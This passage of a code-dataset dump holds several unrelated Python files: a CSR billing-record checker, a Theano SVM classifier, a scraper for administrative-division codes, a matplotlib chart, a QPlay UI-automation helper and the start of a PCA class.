Ensure the input file exist.\n if os.path.exists(input_file_path):\n if os.path.isfile(full_input_file):\n log.info(\"Now checking {0}\".format(full_input_file))\n else:\n handle_error(\"The file {0} does not exist or is not a 
\"\\\n \"valid file.\".format(full_input_file))\n else:\n handle_error(\"The directory {0} does not exist or is not a \"\\\n \"valid directory.\".format(input_file_path))\n\n # Read the CSR file and get the unique contents of the fourth \n # column (which is the start time of the MCS entry with format \n # HH:MM:SS).\n file_hours = []\n try:\n with open(full_input_file, \"rb\") as file_handle:\n reader = csv.reader(file_handle)\n for row in reader:\n if row[3] not in file_hours:\n file_hours.append(row[3])\n # Search for metadata fields in the record.\n if search_metadata(row) == False:\n handle_error(\"Missing metadata field(s) in the \"\\\n \"following record:\\n{0}\\n\".format(row))\n except Exception as exception:\n handle_error(\"Error reading CSR input file {0} \\nException: \"\\\n \"{1}\".format(full_input_file, exception))\n\n # Get the current timestamp and remove the minutes and seconds.\n # RabbitMQ events use UTC timestamps so all timestamps in this code \n # should be handled in UTC.\n rounded_current_hour = datetime.utcnow().strftime(\"%H\")\n rounded_current_time = datetime.utcnow().replace(minute=0, \n second=0).strftime(\"%H:%M:%S\")\n\n # According to what the user specified, build list of hours for \n # comparison against the content of the CSR file.\n comparison_hours = []\n if all_day == True:\n # Build a list with all the hours of the day.\n log.info(\"Now checking entries from 00:00:00 to 23:00:00...\")\n for i in range(0, 24):\n # (range() is not inclusive so we need to add 1 for \n # convenience)\n hour = datetime.now().replace(hour=i, minute=0, second=0)\\\n .strftime(\"%H:%M:%S\")\n if hour not in comparison_hours:\n comparison_hours.append(hour)\n elif up_to_now == True:\n # Build a list with all the hours up until now.\n log.info(\"Now checking entries from 00:00:00 to {0}...\"\\\n .format(rounded_current_time))\n for i in range(0, int(rounded_current_hour)+1):\n # (range() is not inclusive so we need to add 1 for \n # convenience)\n hour = datetime.now().replace(hour=i, minute=0, second=0)\\\n .strftime(\"%H:%M:%S\")\n if hour not in comparison_hours:\n comparison_hours.append(hour)\n else:\n # We will check only the current hour.\n log.info(\"Now checking entries for {0}...\"\\\n .format(rounded_current_time))\n comparison_hours.append(rounded_current_time)\n\n # Any missing entries/hours in the CSR should be reported.\n for hour in comparison_hours:\n if hour not in file_hours:\n handle_error(\"Missing MCS entries for {0} (process: \"\\\n \"{1}, feed: {2})\".format(hour, process, feed))\n else:\n log.info(\"Entries found for {0}\".format(hour))\n\n # If there are missing entries/hours, notify the heroic billing team.\n if errors_found == True:\n attachments = []\n attachments.append(full_log_file_name)\n errors.append(\"\\nFor more information, refer to the logfile {0}, \"\\\n \"(which is attached to this email) or check the actual CSR files \"\\\n \"in {1}.\\n\".format(full_log_file_name, COLLECTOR_LOGS))\n error_message_string = \"\\n\".join(errors)\n # Send an email informing of any problems found.\n emailer.build_email(distribution_group,\n \"ERROR: MCS collection missing CSR records in {0}\".format(hostname), \n email_from,\n error_message_string, \n attachments)\n\n\ndef get_args(argv):\n '''\n Get, validate and parse arguments.\n '''\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-v\", \"--verbose\",\n help = \"Will print INFO, WARNING, and ERROR messages to the stdout \"\\\n \"or stderr.\",\n dest = \"verbose\",\n default = False,\n 
action = \"store_true\")\n parser.add_argument(\"-y\",\"--year\",\n help = \"The year in CCYY format. Defaults to the current year (in UTC)\",\n dest = \"year\",\n default = datetime.utcnow().strftime(\"%Y\"))\n parser.add_argument(\"-m\",\"--month\",\n help = \"The two-digit number of the month (01-12). Defaults to the \"\\\n \"current month (in UTC).\",\n dest = \"month\",\n default = datetime.utcnow().strftime(\"%m\"),\n choices = ['01','02','03','04','05','06','07','08','09','10','11',\n '12'])\n parser.add_argument(\"-d\",\"--day\",\n help = \"The two-digit number of the day. Defaults to the current day.\",\n dest = \"day\",\n default = datetime.utcnow().strftime(\"%d\"),\n choices = ['01','02','03','04','05','06','07','08','09','10',\n '11','12','13','14','15','16','17','18','19','20',\n '21','22','23','24','25','26','27','28','29','30','31'])\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"-a\", \"--allday\",\n help = \"Check all 24 hours of the day (00:00:00 to 23:00:00).\",\n dest = \"all_day\",\n default = False,\n action = \"store_true\")\n group.add_argument(\"-u\", \"--uptonow\",\n help = \"Check all hours of the day up to 'now' (from 00:00:00 to \"\\\n \"XX:00:00) in UTC.\",\n dest = \"up_to_now\",\n default = False,\n action = \"store_true\")\n args = parser.parse_args()\n\n # Ensure that we have a valid date.\n try:\n full_date = datetime(year=int(args.year),\n month=int(args.month),\n day=int(args.day)).strftime(\"%Y%m%d\")\n except Exception as exception:\n logging.error(\"Provided date is invalid. {0}\".format(exception))\n exit(3)\n\n # Set logging level.\n if args.verbose:\n log.setLevel(logging.INFO)\n\n # Call the main function with the appropriate mode.\n main(full_date, args.all_day, args.up_to_now)\n\n\nif __name__ == \"__main__\":\n # Parse arguments from the CLI.\n get_args(sys.argv[1:])\nexit(0)\n", "sub_path": "findMissingCSR.py", "file_name": "findMissingCSR.py", "file_ext": "py", "file_size_in_byte": 14675, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 99, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "socket.gethostname", "line_number": 104, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 123, "usage_type": "call"}, 
{"api_name": "logging.basicConfig", "line_number": 124, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 125, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 126, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 219, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 220, "usage_type": "call"}, {"api_name": "os.path", "line_number": 220, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 235, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 250, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 250, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 251, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 251, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 263, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 263, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 274, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 274, "usage_type": "name"}, {"api_name": "emailer.build_email", "line_number": 301, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 312, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 322, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 322, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 327, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 327, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 333, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 333, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 353, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 357, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 362, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 370, "usage_type": "attribute"}]}
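The comparison-hour list that main() builds above boils down to every full hour from midnight UTC through the current hour. A compact sketch of the same construction:

from datetime import datetime

# Every full hour from 00:00:00 UTC up to and including the current hour.
now_hour = int(datetime.utcnow().strftime('%H'))
comparison_hours = ['{0:02d}:00:00'.format(h) for h in range(now_hour + 1)]
print(comparison_hours)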
+{"seq_id": "613170323", "text": "# coding : utf-8\n\n\"\"\"\nSupport vector machine for multiclass classification problems.\n\"\"\"\n\nfrom __future__ import print_function, absolute_import, division, unicode_literals\nimport sys\nimport time\nfrom logging import getLogger, DEBUG, ERROR\nimport numpy as np\nimport theano\nimport theano.tensor as T\nfrom resfgb.utils import minibatches\nfrom resfgb.models import layers as L\nfrom resfgb.models.classifier import Classifier\nfrom resfgb.optimizers import AGD\n\nlogger = getLogger(__name__)\n\n\nclass SVM(Classifier):\n    def __init__(self, shape, bias=True, wr=0, eta=1e-2, momentum=0.9, gamma=1e+0,\n                 scale=1., minibatch_size=10, eval_iters=1000, seed=99,\n                 log_level=DEBUG):\n        \"\"\"\n        shape          : tuple of integers.\n            Dimension and the number of classes\n        bias           : flag for whether to use bias or not.\n        wr             : float.\n            The L2-regularization parameter.\n        opt_params     : dictionary.\n        minibatch_size : integer.\n            Minibatch size to calculate stochastic gradient.\n        seed           : integer.\n            Seed for random module.\n        \"\"\"\n        super(SVM, self).__init__(eta, scale, minibatch_size, eval_iters, seed,\n                                  log_level)\n\n        self.show_param(shape, wr, eta, momentum, scale, minibatch_size,\n                        eval_iters, seed)\n\n        # input symbols.\n        self.Z = T.matrix(dtype=theano.config.floatX)\n        self.Y = T.ivector()\n        self.symbols = [self.Z, self.Y]\n\n        # parameters.\n        W = L.linear_param(shape[0], shape[1], scale=5e-2)\n        b = L.zeros_param(shape[1])\n        if bias:\n            self.params = [b, W]\n        else:\n            self.params = [W]\n\n        # functions.\n        A = L.FullConnect(self.Z, self.params)  # (n,K), K is the number of classes.\n        margin = A[T.arange(self.Y.shape[0]), self.Y][:, None] - A  # (n,K)\n        self.loss = T.mean(T.sum(T.nnet.softplus(gamma - margin), axis=1))\n        # self.loss = T.mean(T.sum(T.maximum(gamma - margin, 0.), axis=1))\n        self.pred = T.argmax(A, axis=1)\n\n        if wr > 0:\n            self.wr = wr\n            if bias:\n                self.reg = 0.5 * wr * T.sum(self.params[1]**2)\n            else:\n                self.reg = 0.5 * wr * T.sum(self.params[0]**2)\n        else:\n            logger.log(ERROR,\n                       'non-positive regularization parameter is given: {0}'.format(wr))\n            sys.exit(-1)\n\n        self.sgrad = T.grad(cost=self.loss + self.reg, wrt=self.params)\n\n        # compile.\n        self.compile()\n\n        # optimizer.\n        self.optimizer = AGD(self, eta=eta, momentum=momentum)\n\n    def show_param(self, shape, wr, eta, momentum, scale, minibatch_size,\n                   eval_iters, seed):\n        logger.info('{0:<5}{1:^26}{2:>5}'.format('-' * 5, 'SVM setting', '-' * 5))\n        logger.info('{0:<15}{1:>21}'.format('dim', shape[0]))\n        logger.info('{0:<15}{1:>21}'.format('n_class', shape[1]))\n        logger.info('{0:<15}{1:>21.7}'.format('wr', wr))\n        logger.info('{0:<15}{1:>21.7f}'.format('eta', eta))\n        logger.info('{0:<15}{1:>21.7f}'.format('momentum', momentum))\n        logger.info('{0:<15}{1:>21.7f}'.format('scale', scale))\n        logger.info('{0:<15}{1:>21}'.format('minibatch_size', minibatch_size))\n        logger.info('{0:<15}{1:>21}'.format('eval_iters', eval_iters))\n        logger.info('{0:<15}{1:>21}'.format('seed', seed))\n\n    def compile(self):\n        self.predict = theano.function([self.Z], self.pred)\n        self.loss_func = theano.function([self.Z, self.Y], self.loss)\n        self.reg_func = theano.function([], self.reg)\n", "sub_path": "resfgb/models/svm.py", "file_name": "svm.py", "file_ext": "py", "file_size_in_byte": 3770, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "resfgb.models.classifier.Classifier", "line_number": 22, 
"usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 25, "usage_type": "name"}, {"api_name": "theano.tensor.matrix", "line_number": 45, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 45, "usage_type": "name"}, {"api_name": "theano.config", "line_number": 45, "usage_type": "attribute"}, {"api_name": "theano.tensor.ivector", "line_number": 46, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 46, "usage_type": "name"}, {"api_name": "resfgb.models.layers.linear_param", "line_number": 50, "usage_type": "call"}, {"api_name": "resfgb.models.layers", "line_number": 50, "usage_type": "name"}, {"api_name": "resfgb.models.layers.zeros_param", "line_number": 51, "usage_type": "call"}, {"api_name": "resfgb.models.layers", "line_number": 51, "usage_type": "name"}, {"api_name": "resfgb.models.layers.FullConnect", "line_number": 58, "usage_type": "call"}, {"api_name": "resfgb.models.layers", "line_number": 58, "usage_type": "name"}, {"api_name": "theano.tensor.arange", "line_number": 59, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 59, "usage_type": "name"}, {"api_name": "theano.tensor.mean", "line_number": 60, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 60, "usage_type": "name"}, {"api_name": "theano.tensor.sum", "line_number": 60, "usage_type": "call"}, {"api_name": "theano.tensor.nnet.softplus", "line_number": 60, "usage_type": "call"}, {"api_name": "theano.tensor.nnet", "line_number": 60, "usage_type": "attribute"}, {"api_name": "theano.tensor.argmax", "line_number": 62, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 62, "usage_type": "name"}, {"api_name": "theano.tensor.sum", "line_number": 67, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 67, "usage_type": "name"}, {"api_name": "theano.tensor.sum", "line_number": 69, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 69, "usage_type": "name"}, {"api_name": "logging.ERROR", "line_number": 71, "usage_type": "argument"}, {"api_name": "sys.exit", "line_number": 73, "usage_type": "call"}, {"api_name": "theano.tensor.grad", "line_number": 75, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 75, "usage_type": "name"}, {"api_name": "resfgb.optimizers.AGD", "line_number": 81, "usage_type": "call"}, {"api_name": "theano.function", "line_number": 97, "usage_type": "call"}, {"api_name": "theano.function", "line_number": 98, "usage_type": "call"}, {"api_name": "theano.function", "line_number": 99, "usage_type": "call"}]}
+{"seq_id": "404671322", "text": "import re\nimport requests\nfrom fake_useragent import UserAgent\nfrom lxml import etree\nimport pymysql\n\n\nclass Mz():\n    def __init__(self):\n        self.headers = {'User-Agent': UserAgent().random}\n        self.url = 'http://www.mca.gov.cn/article/sj/xzqh/2019/'\n        self.db = pymysql.connect('localhost', 'root', '990430', 'spider_db', charset='utf8')\n        self.cursor = self.db.cursor()\n\n    def get_html(self, url):\n\n        html = requests.get(url=url, headers=self.headers).text\n        return html\n\n    def parasm_html(self):\n        one_html = self.get_html(url=self.url)\n        par = etree.HTML(one_html)\n        url_list = par.xpath('//a[contains(@title,\"中华人民共和国县以上行政区划代码\")]/@href')\n        two_url = 'http://www.mca.gov.cn' + url_list[0]\n        print(two_url)\n        two_html = self.get_html(two_url)\n        p = re.compile('window.location.href=\"(.*?)\"', re.S)\n        two_list = p.findall(two_html)[0]\n        print(two_list)\n        # Check whether this url still needs to be crawled\n        p = self.write_db(two_list)\n        if p:\n            three_html = self.get_html(two_list)\n            self.xpath_two(three_html)\n        else:\n            print('No updates')\n\n    def xpath_two(self, html):\n        par_two = etree.HTML(html)\n        two_list_area = par_two.xpath('//td[@class=\"xl718256\"]/text()')\n        # print(two_list)\n        # County-level data\n        l = self.Adjust_the_data(two_list_area)\n        # 'counties' is the county table name\n        self.insert_id('counties',l)\n        # City-level data\n        two_list_The_city = par_two.xpath('//td[@class=\"xl708256\"]/text()')\n        l2 = self.Adjust_the_data(two_list_The_city)\n        self.insert_id('province',l2)\n\n\n    def insert_id(self,grade,data):\n        sql = 'insert into '+grade+'(编号,地区) values (%s,%s)'\n        try:\n            self.cursor.executemany(sql,data)\n            self.db.commit()\n        except Exception as e:\n            print(e)\n            self.db.rollback()\n\n\n\n\n\n    def write_db(self, data):\n        sql = 'select * from url where url=%s'\n        d = self.cursor.execute(sql,[data,])\n        if not d:\n            try:\n                insert_sql = 'insert into url(url) values (%s)'\n                self.cursor.execute(insert_sql, [data,])\n                self.db.commit()\n                return True\n            except:\n                self.db.rollback()\n                print('10010')\n                return False\n\n    def Adjust_the_data(self, list):\n        n = 0\n        l = []\n        while 1:\n            try:\n                l.append((list[n], list[n + 1]))\n                n += 2\n            except:\n                break\n        return l\n\n    def run(self):\n        self.parasm_html()\n\n\nif __name__ == '__main__':\n    spider = Mz()\n    spider.run()\n", "sub_path": "day04/demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 2762, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "fake_useragent.UserAgent", "line_number": 10, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 22, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 22, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.S", "line_number": 27, "usage_type": "attribute"}, {"api_name": "lxml.etree.HTML", "line_number": 39, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 39, "usage_type": "name"}]}
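Adjust_the_data in the spider above pairs up a flat [code, name, code, name, ...] list by indexing two at a time inside a try/except. An idiomatic equivalent zips two offset slices:

def pair_up(flat):
    # ['110000', 'Beijing', '120000', 'Tianjin'] -> [('110000', 'Beijing'), ...]
    return list(zip(flat[0::2], flat[1::2]))

print(pair_up(['110000', 'Beijing', '120000', 'Tianjin']))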
+{"seq_id": "461020926", "text": "\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button, RadioButtons\nfrom math import floor, ceil\n\nfrom data_proc import *\n\nbmp = ms_ds.copy()\nbins = pd.cut(ms_ds['year'].map(lambda x: int(x)), 10)\nbmp['db'] = bins\nbmp['count'] = 1\n\nubins = bins.unique()[::-1]\n\ndef calc_max():\n\treturn bmp.groupby(['db', 'month'])['count'].sum().max()\n\nmax_value = calc_max()\n\ndef bin_text_repr(b):\n\tnlow = int(ceil(b.left))\n\tnhigh = int(floor(b.right))\n\treturn \"[{}, {}]\".format(nlow, nhigh)\nbins_txt = map(bin_text_repr, ubins)\n\ndef for_year_bin(bin_id):\n\tbmpy = bmp[bmp['db'] == ubins[bin_id]]\n\tby_month = bmpy.groupby(['month']).sum()\n\tby_month = by_month[['Fatalities', 'Injured', 'Total victims', 'count']]\n\treturn by_month\n\nfig, ax = plt.subplots()\nplt.subplots_adjust(bottom=0.25)\n\n# (h_left, v_left, len, height)\nax_year = plt.axes([0.15, 0.1, 0.65, 0.03])\ns_year = Slider(ax_year, 'Year', 0, len(ubins) - 0.1, valfmt = \"%d\")\n\nscale_fixed = False\nbtn_ax = plt.axes([0.8, 0.025, 0.1, 0.04])\nbtn_fix_scale = Button(btn_ax, 'Fix scale', hovercolor='0.975')\n\ndef plot(bin_id):\n\tdata = for_year_bin(bin_id)\n\n\tax.clear()\n\t\n\tax.set_xticks(range(1,13))\n\tax.set_xlim([0,13])\n\tif scale_fixed:\n\t\tax.set_ylim([0, max_value+1])\n\n\ts_year.valtext.set_text(bins_txt[bin_id])\n\n\tax.bar(data.index, data['count'])\n\tfig.canvas.draw_idle()\n\ndef update(val):\n\tbin_id = int(s_year.val)\n\tplot(bin_id)\n\ndef on_fix_button_click(event):\n\tglobal scale_fixed\n\tscale_fixed = not scale_fixed\n\tupdate(\"\")\n\ns_year.on_changed(update)\nbtn_fix_scale.on_clicked(on_fix_button_click)\n\nplot(0)\n\nfig.canvas.draw()\nplt.show()", "sub_path": "preliminary-analysis/i_y_count.py", "file_name": "i_y_count.py", "file_ext": "py", "file_size_in_byte": 1601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "math.ceil", "line_number": 21, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.widgets.Slider", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.widgets.Button", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}]}
+{"seq_id": "486889197", "text": "# -*- coding: UTF-8 -*-\r\nimport random\r\n\r\nimport time\r\n\r\nfrom utils.utils import Utils\r\n\r\n\r\nclass Qplay:\r\n\r\n def __init__(self):\r\n global d\r\n d = Utils().get_device_obj()\r\n\r\n if not 'pateo.dls.qplay'.__eq__(d.info['currentPackageName']):\r\n Utils().raise_Exception_info('当前界面和预期界面不一致')\r\n\r\n # 获取本地音乐控件\r\n def __get_qplay_selector_ele(self):\r\n return Utils().get_ele_by_resourceId('pateo.dls.qplay:drawable/selector_menu_local')\r\n # 获取qplay本地歌曲窗口\r\n def __get_qplay_local_drawer_ele(self):\r\n return Utils().get_ele_by_resourceId('pateo.dls.qplay:id/drawer')\r\n\r\n # 获取音乐名称控件\r\n def __get_qplay_local_name_ele(self):\r\n return Utils().get_ele_by_resourceId('pateo.dls.qplay:id/drawer_list_category_text')\r\n\r\n # 获取当前播放的控件名称\r\n def __get_qplay_play_name_ele(self):\r\n return Utils().get_ele_by_resourceId('pateo.dls.qplay:id/title')\r\n # 获取qplay返回主界面控件\r\n def __get_qplay_home_ele(self):\r\n return Utils().get_ele_by_resourceId('pateo.dls.qplay:drawable/selector_button_home')\r\n # 点击本地音乐选择控件\r\n def click_qplay_selector_ele(self):\r\n ele = self.__get_qplay_selector_ele()\r\n if ele.wait.exists():\r\n ele.click.wait()\r\n else:\r\n Utils().raise_Exception_info('本地音乐选择控件不存在')\r\n # 获取当前播放的音乐名称\r\n def get_qplay_play_name(self):\r\n ele = self.__get_qplay_play_name_ele()\r\n if ele.exists:\r\n return ele.text.strip()\r\n else:\r\n Utils().raise_Exception_info('当前没有音乐播放')\r\n # 点击返回主界面\r\n def click_qplay_home_ele(self):\r\n ele = self.__get_qplay_home_ele()\r\n if ele.exists:\r\n ele.click.wait()\r\n else:\r\n Utils().raise_Exception_info('qplay返回主界面控件不存在')\r\n\r\n #随机播放qplay本地音乐\r\n def click_qplay_local_name_random(self):\r\n # 判断是否已经播放音乐\r\n ele_name = self.__get_qplay_local_drawer_ele()\r\n if not ele_name.exists:\r\n self.click_qplay_selector_ele()\r\n # 随机选择\r\n ele = self.__get_qplay_local_name_ele()\r\n if ele.wait.exists() > 0:\r\n size = len(ele)\r\n idx = random.randint(0, size - 1)\r\n name = ele[idx].text.strip()\r\n ele[idx].click.wait()\r\n return name\r\n else:\r\n Utils().raise_Exception_info('qplay音乐列表为空')\r\n\r\n # 隐藏qplay本地歌曲窗口\r\n def hide_qplay_local_drawer_ele(self):\r\n ele = self.__get_qplay_local_drawer_ele()\r\n if ele.exists:\r\n # 获取窗口坐标\r\n x = ele.info['bounds']['right']\r\n y = int(ele.info['bounds']['bottom']) / 2\r\n # 滑动隐藏\r\n d.swipe(x, y, 0, y, 30)\r\n else:\r\n Utils().raise_Exception_info('qplay本地歌曲窗口不存在')\r\n\r\n # 验证当前是qplay初始界面\r\n def check_qplay_init(self):\r\n # 等待3s\r\n time.sleep(3)\r\n if not d(text = '连接QPlay').wait.exists():\r\n Utils().raise_Exception_info('当前不是QPlay初始界面')\r\n # 从音乐界面返回到launcher界面\r\n\r\n def back_to_launcher(self):\r\n # 判断是否在我的音乐库或音乐列表界面或者酷我,今日歌单\r\n if self.__get_qplay_local_drawer_ele().exists:\r\n self.hide_qplay_local_drawer_ele()\r\n self.click_qplay_home_ele()\r\n else:\r\n self.click_qplay_home_ele()\r\n", "sub_path": "autotestproject/actions/qplay.py", "file_name": "qplay.py", "file_ext": "py", "file_size_in_byte": 3692, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "utils.utils.Utils", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 20, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.utils.Utils", 
"line_number": 31, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 48, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 55, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 67, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "144159754", "text": "\"\"\"\nBase class for PCA objects\n\"\"\"\n\nimport numpy as N\nfrom scipy.optimize import leastsq\nimport logging\n\nclass PCA(object):\n \"\"\"\n Base object for PCA algorithms. Defines property accessors like\n x.mean and x.eigenvectors . Specific PCA implementations will\n extend this to provide the actual PCA algorithm. This class is\n not useable as-is; use a subclass like EM_PCA or WeightedCovPCA.\n \"\"\"\n\n @property\n def model(self):\n \"\"\"Model object to access the eigenvectors, projections, etc.\"\"\"\n return self._model\n\n @property\n def mean(self):\n \"\"\"Mean of input data\"\"\"\n return self._mean\n\n @property\n def var(self):\n \"\"\"Variance of input data\"\"\"\n return self._var\n\n @property\n def eigenvalues(self):\n \"\"\"PCA Eigenvalues\"\"\"\n return self._eigenvalues\n\n @property\n def eigenvectors(self):\n \"\"\"PCA Eigenvectors\"\"\"\n return self._eigenvectors\n\n def project(self, data, var=None, nvec=None):\n \"\"\"\n Return the projection coefficients. If nvec is None, return\n as many coefficients as we have eigenvectors.\n \n Input:\n data[nobs, nvar] or data[nvar]\n \n Optional Inputs:\n var[nobs, nvar] or var[nvar] - variance of data\n nvec - number of eigenvectors to use\n \n Returns:\n c[nobs, nvec] or c[nvec] - projection coefficients\n c_cov[nobs, nvec,nvec] - projection coefficient covariance\n or c_cov[nobs, nvec, nvec]\n \"\"\"\n\n #- Internal function to calculate (model - data)/weight\n def _func(coeffs, basis, data, weight) :\n return weight * ( N.dot(basis.T, coeffs) - data.T )\n\n #- Basic setup; recast to masked arrays; create missing args\n if nvec is None:\n nvec = len(self.eigenvalues)\n \n if var is None:\n var = N.ma.ones(data.shape)\n else:\n var = N.ma.array(var)\n\n #- check data[nvar] vs. data[nobs, nvar]\n #- recursively call with (1 x nvar) arrays; cast back to 1D\n if len(data.shape) == 1:\n data = N.ma.atleast_2d(data)\n var = N.ma.atleast_2d(var)\n c, cov = self.project(data, var=var, nvec=nvec)\n return c[0], cov[0]\n\n nobs, nvar = data.shape\n xdata = N.ma.array(data) - self.mean\n\n all_coeff = list()\n all_cov = list()\n c0 = N.zeros(nvec)\n for iobs, (x, v) in enumerate(zip(xdata, var)):\n logging.debug('Projecting observation %d' % iobs)\n coeff = N.nan * N.ones( nvec )\n cov = N.nan * N.ones( ( nvec, nvec ) )\n if x.any() :\n weight = 1.0/N.sqrt(v)\n basis = self.eigenvectors[0:nvec]\n args = (basis, x, weight)\n ### import code; code.interact(local=locals())\n # print 'project', iobs\n coeff, cov = leastsq(_func, c0, args, full_output=True)[0:2]\n d2 = _func(coeff, basis, x, weight )**2\n chi2dof = d2.sum() / float(x.count() - nvec)\n cov *= chi2dof\n all_coeff.append(coeff)\n all_cov.append(cov)\n\n return N.array(all_coeff), N.array(all_cov)\n\n\n def reconstruct(self, coeffs, cov=None):\n \"\"\"\n Given a set of coefficients (and optionally their covariance),\n return the reconstruction using the current set of eigenvectors.\n \n Input:\n coeff[nobs, nvec] or coeff[nvec]\n \n Optional:\n cov[nobs, nvec, nvec] or cov[nvec, nvec]\n \n Returns:\n reconstruction[nvar] or reconstruction[nobs, nvar]\n reconstruction_var[nvar] or [nobs, nvar]\n \n if cov is provided as input, returns 